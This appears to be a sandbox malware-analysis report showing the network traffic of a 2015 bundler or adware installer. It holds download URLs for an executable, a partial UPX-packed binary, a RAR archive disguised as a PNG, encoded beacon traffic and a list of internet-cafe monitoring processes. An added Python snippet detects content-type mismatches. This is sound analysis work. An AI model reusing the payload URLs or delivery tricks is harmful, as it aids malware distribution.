hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=577236194 | 42.120.219.171 |
hxxp://cnzz.mmstat.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 | 42.120.219.171 |
hxxp://z.rising.com.cn/LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | |
hxxp://z.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | |
hxxp://data1.iruixing.com/irg.ashx?d= | 101.254.23.28 |
hxxp://data1.iruixing.com/irg.ashx?d=UEgnFnp/FHMXDgsCJzdSZntxEnAQCAoAUkNXYHx5EnAQCAIBVUNXY3d5GnsRDBcAUV1QY2F5GXsTAwIEWEpRZH19E3txeW8= | 101.254.23.28 |
hxxp://z.rising.com.cn/rs2012/RsPcVer12.xml | |
hxxp://cloud.rising.com.cn/productstat/productStat.aspx?info=JVD5Mt0GKRdfSg9YaENEWhsAMAENEk0ROAINYj06CjFzBRgLZCIDYlkwEkh7EztVFyEdb1sgHzZlDi0tbFYAE00TPBcNEV9LaVUeF1hLaV0WVQIXLwBCHllRd1UBDV9Ud1wDBQQWZFUWSwQWLVhzZV5TbFYEFVlXHyEGFV9dalUDE1hValUDE1hValUDE00EOhFZTAUMPVgBF1tWal0ABQcENwINEllQa0NTTw8ELQANBRgROBFVHltDMBUNBRgLBhVCSh0MNQBXRlZUbkNDTTQVKwpeQgYAZFQABRgLBhVCTB8cKQANEU0WNzpRUQ4EZFUWUAU6OglZRgURNxBdHlpDKgtvTwIIMBENFk0HMAJFUw8ELQANE4k= | 211.103.159.105 |
hxxp://config.0551fs.com/Public/conf/open/1/35_1_0_1_1/11.jpg | 61.147.111.59 |
hxxp://down.0551fs.com/xlxc/img/567015/img.png | 61.147.111.59 |
hxxp://rsup10.rising.com.cn/register/minicenter/e/c.aspx | 1.122.192.19 |
hxxp://c.cnzz.com/core.php?web_id=1255160857&t=z | 195.27.31.246 |
hxxp://center.rising.com.cn/urg.asp?v=ravbase&t=rav&a= | 1.122.192.19 |
hxxp://dl.ikiki.cn/dl/qdtg/install1403380.exe | 171.107.186.80 |
hxxp://config.0551fs.com/Public/conf/open/1/35_1_0_1_1/10.jpg | 61.147.111.59 |
hxxp://rsup10.rising.com.cn/rs2012/RsPcVer12.xml | 1.122.192.19 |
hxxp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | 1.122.192.19 |
hxxp://config.0551fs.com/Public/conf/cpa/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
hxxp://s11.cnzz.com/z_stat.php?id=1255160857 | 1.99.192.16 |
hxxp://config.0551fs.com/Public/conf/c-lock/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
hxxp://config.0551fs.com/Public/conf/homepage/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
hxxp://center.rising.com.cn/LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ | 1.122.192.19 |
hxxp://config.0551fs.com/Public/conf/icon/2/35_1_0_1_1/567015.xml | 61.147.111.59 |
hxxp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015 | 61.147.111.59 |
hxxp://pcookie.cnzz.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 | 42.120.219.171 |
hxxp://config.0551fs.com/Public/conf/resource_donum.xml | 61.147.111.59 |
hxxp://config.0551fs.com/Public/conf/cybercafe_check/index.xml | 61.147.111.59 |
down.llhan.com | 222.186.129.20 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /9.gif?abc=1&rnd=577236194 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 09 Jul 2015 03:10:30 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=7288e500; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=20b8ee1ffd2faf9203e2e2d3_1436411430; expires=Sun, 06-Jul-25 03:10:30 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;
GET /dl/qdtg/install1403380.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: dl.ikiki.cn
Cache-Control: no-cache
HTTP/1.0 200 OK
Date: Wed, 08 Jul 2015 04:55:38 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 07 Jul 2015 12:29:24 GMT
Accept-Ranges: bytes
ETag: "3051f8fb0b8d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 4786008
Age: 80058
Via: 1.0 jxjj35:80 (Cdn Cache Server V2.0), 1.0 nanning15:8101 (Cdn Cache Server V2.0)
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............m.......d.....1.......<.R.....<.P.......P.....E...........B...1.m.....1.R.#...S.S.....1.W.....Rich............PE..L....i.T.....................0......`.............@........................... .......I.........................................D........'..........8.H. ...........................................P...H...........................................UPX0....................................UPX1................................@....rsrc....0.......*..................@..............................................................................................................................................................................................................................................................................................................................................................................3.07.UPX!.....uX..._.....Y...8`Q.&.....d.:Mw....Uo....9dU..gSbCw..}.t...(g..R\.rGo.L.*.....A.}..I....*>..0-..".e."2..nO.....(.M...B..._...8.......*f........Z.W;E,.....A.......p.y...,H..|.O ..Gr....J....8..........Q\.2......A..................Cl.......&^o....9...S.=..y...{jd......~...c.....XF^h..z./.,.<....{.....c..\.......Z...D0Z..4O".......%.x...2.W..*..K .$*..VO...../...{X...J...>c*...H]....CC.;(P.Gn .....lb..G.mN..K%Gs..yK....e...d....n../6.......\..:..~qn{..././...~-..R....\..W*CK...r...7L...?L..s......?R...p..y.....Nv.Vr.u.
<<< skipped >>>
GET /Public/conf/homepage/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 09 Jul 2015 03:10:20 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..
<<< skipped >>>
GET /Public/conf/cybercafe_check/index.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:17 GMT
Content-Type: text/xml
Content-Length: 633
Last-Modified: Wed, 24 Sep 2014 06:14:22 GMT
Connection: keep-alive
ETag: "5422613e-279"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
<?xml version="1.0" encoding="utf-8"?>.<root>.<!-- .................. -->..<reg>...<item></item>...<item></item>..</reg>.<!-- ..................... -->..<icon>...<item>............</item>...<item>.........</item>...<item>iKeeper</item>...<item>............</item>...<item>......</item>...<item>............</item>...</icon>.<!-- ............... -->..<process>...<item>ikeeper.exe</item>...<item>DbntCli.exe</item>...<item>.............exe</item>...<item>BarClientView.exe</item>...<item>lock.exe</item>...<item>BarMonitor.exe</item>...<item>DF5Serv.exe</item>...<item>PBSClient.exe</item>...<item>Clsmn.exe</item>..</process>.</root>
<<< skipped >>>
GET /irg.ashx?d= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: data1.iruixing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:42 GMT
Content-Length: 0
....
GET /irg.ashx?d=UEgnFnp/FHMXDgsCJzdSZntxEnAQCAoAUkNXYHx5EnAQCAIBVUNXY3d5GnsRDBcAUV1QY2F5GXsTAwIEWEpRZH19E3txeW8= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: data1.iruixing.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:42 GMT
Content-Length: 0
GET /xlxc/img/567015/img.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.0551fs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:09:59 GMT
Content-Type: image/png
Content-Length: 775012
Last-Modified: Tue, 02 Jun 2015 05:47:08 GMT
Connection: keep-alive
ETag: "556d435c-bd364"
Expires: Thu, 16 Jul 2015 03:09:59 GMT
Cache-Control: max-age=604800
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
Rar!.....s..........Ert@.8............hB.`.F.3.. ...InStaller\bg_01.png...tg....L..YQ.U&..MXv.kUZ..V%...j.T...S*.poc\.^...}..B.......3.:\.I....d~.::!IA$H<|<...IiH....I....7....Kw...9.)m..........G...OjFFRRiotos..../..W.&.v..o.c.......x...{0....Et.d.19EHn .....3......$8z.....R...xzT.>..m.B$L:.R...1&.%...?//....).^./9B....r...Pc.HC.."H....[.......Q].{.....=.//....^.....A.3..E........A.d..I........3V.....................H...-.,.J.KXs...4.....%.RJB........!.....(d.aW.`..v.$.....N..Q...@g.dS..1).@21..@I*pL..6.f.....(......*..l3k...w....&..l.Eb...g..'...(.J...."..?..}.v....wk}..g?f..._Cy:.7N...X@P0..W>.....K..=k..]2.6..3N.....t..~[..S........!...x..)S....r)...i.f)............-U{A......V....).....G.. .X....z........U"t.7.eI.rl_......I$..t...5L*....e.;e..08DP..k.2..Y.X.........x04...r..86D.....<....c..A..................\...1|...JoO.Q~......e....Ot...BG.E...lo.N..l..@q..|>..w..0..H....D....q.D.!....D.IF./.$.0.*d.8.T!...Y.....'!....?(.\B_.O.M.I...z.O.!.....~'.u.1..Q}.R}.0~.....~.17.....&5..0.M./M.z..#...>W.6...p..p.D.t.4A{6...R...1.... ~.........JU.Qb/n.....k~XO%J.bT./....{].... .&.*`,..a.J)....P.&*..%.%..j..P.....
<<< skipped >>>
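The exchange above declares Content-Type: image/png, yet the body begins with the RAR signature (Rar!) and the file activity earlier records the same download being unpacked as ...\skinconfig\...\ui\img.rar. Earlier in this section the install1403380.exe download from dl.ikiki.cn is an MZ/PE whose section table carries UPX0/UPX1 and a "3.07 UPX!" marker. The Python below is an added example, not code from the report or from either vendor: it sniffs the leading bytes of captured HTTP response bodies, compares them with the declared Content-Type, and walks the PE section table of executable bodies to spot UPX packing. The magic-byte table, the constructed sample responses and the minimal fake PE used as input are my own assumptions for the demonstration.

```python
import struct

# Magic-byte table (assumed common signatures; not taken from the report).
MAGICS = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"Rar!\x1a\x07", "application/x-rar-compressed"),
    (b"PK\x03\x04", "application/zip"),
    (b"MZ", "application/x-dosexec"),
    (b"<?xml", "text/xml"),
]
GENERIC = {"", "application/octet-stream"}  # declared types that promise nothing


def sniff(body: bytes) -> str:
    """MIME type implied by the body's leading bytes, or octet-stream if unknown."""
    for magic, kind in MAGICS:
        if body.startswith(magic):
            return kind
    return "application/octet-stream"


def pe_section_names(body: bytes) -> list:
    """Section names from a PE header; [] if the bytes are not a parsable PE."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if len(body) < e_lfanew + 24 or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    nsections = struct.unpack_from("<H", body, e_lfanew + 6)[0]      # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", body, e_lfanew + 20)[0]      # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                 # first IMAGE_SECTION_HEADER
    names = []
    for i in range(nsections):
        off = table + 40 * i
        if off + 40 > len(body):
            break
        names.append(body[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def check_response(raw: bytes) -> dict:
    """Compare declared Content-Type with sniffed type; note UPX-packed PE bodies."""
    status, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff(body)
    notes = []
    if actual == "application/x-dosexec":
        names = pe_section_names(body)
        if any(n.startswith("UPX") for n in names):
            notes.append("PE packed with UPX (sections %s)" % ",".join(names))
    mismatch = declared not in GENERIC and actual not in GENERIC and declared != actual
    return {"status": status, "declared": declared, "actual": actual,
            "mismatch": mismatch, "notes": notes}


def fake_upx_pe(section_names=(b"UPX0", b"UPX1", b".rsrc")) -> bytes:
    """Constructed minimal PE: DOS header, PE signature, COFF header, no optional header."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    table = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + table


# Constructed responses modelled on the captures in this section (not the raw captures).
SAMPLES = {
    "img.png that is a RAR": b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: image/png\r\n\r\n"
                             b"Rar!\x1a\x07\x00\xcf\x90s\x00\x00",
    "9.gif": b"HTTP/1.1 302 Found\r\nContent-Type: image/gif\r\n\r\nGIF89a\x01\x00\x01\x00",
    "install1403380.exe": b"HTTP/1.0 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n" + fake_upx_pe(),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, "->", check_response(raw))
```

Run over a real capture, the check would have to be applied to the reassembled body rather than the first TCP segment, but the leading bytes are all it needs: the mismatch flag fires on the img.png response, and the executable download is reported as UPX-packed from its section names alone.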
GET /core.php?web_id=1255160857&t=z HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 764
Connection: keep-alive
Date: Thu, 09 Jul 2015 03:10:29 GMT
Last-Modified: Thu, 09 Jul 2015 03:10:29 GMT
Expires: Thu, 09 Jul 2015 03:25:29 GMT
Via: cache21.l2de1[1524,200-0,M], cache55.l2de1[1536,0], cache7.de1[1536,200-0,M], cache4.de1[1537,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:3:404373549
X-Swift-SaveTime: Thu, 09 Jul 2015 03:10:29 GMT
X-Swift-CacheTime: 900
!function(){var p,q,r,a=encodeURIComponent,b="1255160857",c="",d="",e="online_v3.php",f="z13.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_"+b]["bobject"],l="http:",m="0",n=l+"//online.cnzz.com/online/"+e,o=[];o.push("id="+b),o.push("h="+f),o.push("on="+a(d)),o.push("s="+a(c)),n+="?"+o.join("&"),"0"===m&&k["callRequest"]([l+"//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id="+b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l+"//icon.cnzz.com/img/"+c+".gif",p="<a href='"+q+"' target=_blank title='"+j+"'><img border=0 hspace=0 vspace=0 src='"+r+"'></a>"):p="<a href='"+q+"' target=_blank title='"+j+"'>"+j+"</a>",k["createIcon"]([p])))}();
<<< skipped >>>
GET /z_stat.php?id=1255160857 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s11.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Thu, 09 Jul 2015 03:10:26 GMT
Last-Modified: Thu, 09 Jul 2015 03:10:26 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache1.l2de1[3601,200-0,M], cache47.l2de1[3613,0], cache5.de1[3612,200-0,M], cache9.de1[3614,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:7:449242244
X-Swift-SaveTime: Thu, 09 Jul 2015 03:10:26 GMT
X-Swift-CacheTime: 5400
296..(function(){function k(){this.c="1255160857";this.R="z";this.N="";this.K="";this.M="";this.r="1436411426";this.P="oz.cnzz.com";this.L="";this.u="CNZZDATA"+this.c;this.t="_CNZZDbridge_"+this.c;this.F="_cnzz_CV"+this.c;this.G="CZ_UUID"+this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1255160857");c.push("name="+f(a.name));c.push("msg="+f(a.message));c.push("r="+f(h.referrer));c.push("page="+f(e.location.href));c.push("agent="+f(e.navigator.userAgent));c.push("ex="+f(b));c.push("rnd="+Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?"+c.join("&")}catch(d){}}var h=document,e=wind..2288..ow,f=encodeURIComponent,l=decodeURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},na:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b++){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.
<<< skipped >>>
GET /productstat/productStat.aspx?info=JVD5Mt0GKRdfSg9YaENEWhsAMAENEk0ROAINYj06CjFzBRgLZCIDYlkwEkh7EztVFyEdb1sgHzZlDi0tbFYAE00TPBcNEV9LaVUeF1hLaV0WVQIXLwBCHllRd1UBDV9Ud1wDBQQWZFUWSwQWLVhzZV5TbFYEFVlXHyEGFV9dalUDE1hValUDE1hValUDE00EOhFZTAUMPVgBF1tWal0ABQcENwINEllQa0NTTw8ELQANBRgROBFVHltDMBUNBRgLBhVCSh0MNQBXRlZUbkNDTTQVKwpeQgYAZFQABRgLBhVCTB8cKQANEU0WNzpRUQ4EZFUWUAU6OglZRgURNxBdHlpDKgtvTwIIMBENFk0HMAJFUw8ELQANE4k= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: cloud.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2enbz03lz411ep5541tucmjm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
ok
GET /Public/conf/cpa/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:16 GMT
Content-Type: text/xml
Content-Length: 18440
Last-Modified: Thu, 09 Jul 2015 02:02:22 GMT
Connection: keep-alive
ETag: "559dd62e-4808"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
..._..O.K......&.......y.....{.".......g.........<..w .LL?.%./x@k.a..d....[....VsL....n=.........{SI.........,BzT.j.w...9X..5..6...x."......Q........=1=K...$.ZL6n;..R|.....?..G..Z..h.L@;.b.x.A....Ik.OK...$.ZL6n;..R|..-d...{BK...$.ZL...%pwX..{.,...F.x........qY...........d>..e..}........d:.X....kt..@T......MF...X.../....i.pMn.%....-.....j....|...S.......n.g%).(.E.(.}.|p{...Q h...-..@..~...w.xUr.M..@..~...w.0'....x.d.f.....\$-s$M....&.H..UA-......U.........s?......1....4q!{g...Y......s.%.....Rd'......l....}.U.{..g.._3......u...GK...3......u....<0.Yva...Z..h.h.J*P.>......A.i.......b..........7..B.Vtd?~..x..t..>..f..;.i.f..;..!)...-.:.S`=u.K...s.K...Y. ..L.py..U .....89.?:..M.5.. .f...Sg ....m..l1.....nE....k;........nE.....#y!...ed}\.NFE.. .V.#.D...|9.... .wiO..}.'.\e &.vo...y.%iYz....^.s..,k.%iYz.....t..].!G.]B a../|..7..K..9..."lEd. =.={m..a<.(.;.O..... ..c....jDN8.FC....[..S4S.60M..V9.#..I..b.c..$......"c...J..@... ..c....|....q.D..?R.......T9....\.V~..u............V.2.D..'.~)..zj..Ep...9|.*.q@..8..m%r^5.y......1.=..I.'.)o3..t..Z.......r.D.xoe.a.]{.l6..9.~t.@.;(.({.........q_...R...Z%...U......e.x....T&......../|..7..K..9..."l..&. U.|EkL..J..<...s.....!..-,.Z..d.....o..!...........k....w.M..&..]&....L...VN.L>..~...ar....{.6...;Jm...&.G....EG....../B.&..4......T..#B<.yD.A#.pX.....CG...].........3..la(......9T..A3o@.i..oP.[F..{.SG.%i..oP.[F...\4.V|...>$E.6.V.....w~ng..U.=U...7....$.EBIh'.g..`.iS....iQ..7>F.>.E.]..r......X...}.tZ]...a.......1....c...a..C.?...e.n...2$..C.?... ...
<<< skipped >>>
POST /register/minicenter/e/c.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Content-Length: 304
Connection: Keep-Alive
Cache-Control: no-cache
3Z/FQXWSEHFZUgkjSWkPGx47HTFOSgl4R3MNXhkzD3EVGU4ZLWYZDF9uXWEdfyhsXWcXClxpW2AfClxpW2AfClxpW3EDGU4pDCZGXU5gS3ENFUx4CjBbUAM0AjcNA0x4SX8PGxg7DHEVGU4oDiBwTg0uCDtwUAIpHzJDVU52SSBbXBx4UXMNCE52YlomMGVTS3MNSwkpHj9bG1Z6SSddTAl4R3MNXB4oBCFMVgg/SWkPG052S3FdXAE7GTgNA0x4Aj1cTQ02BzFKXgU0SX8PGxw7SWkPG052S3FfW05gS3ENRNs=
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1
0
POST /register/minicenter/e/c.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Content-Length: 308
Connection: Keep-Alive
Cache-Control: no-cache
94IGPMlISxITV11VEgpFHkpNRlIET10OHBBHW01FVBJfHBpvdgVTCQsYBgJXenwaBgRdDwgfAANVDwgfAANVDwgfABJJHBpfV0UMWBoWEBJHEBgOUVMRVVdCWVRHBhgOEhxFHkxNVxJfHBpeVUM6S1lYU1g6VVZfRFEJUBoAEkMRWUgOChBHCBoAOTlsNTElEBBHTl1fRVwRHgIMEkQXSV0OHBBHWUpeX0IGU1xJEgpFHhoAEBIXWVVNQltHBhgOdUgRTllPREMQX1tJQ0NHEBgOQFFHBhgOEhxFHkhOEgpFHhpRog==
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1
0
GET /Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Connection: Keep-Alive
Host: rsup10.rising.com.cn
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 647
rsd..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSE+XDCyUewEQk9pr9TKQlxLsgKQw==" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /Public/conf/open/1/35_1_0_1_1/10.jpg HTTP/1.1
Host: config.0551fs.com
Accept:
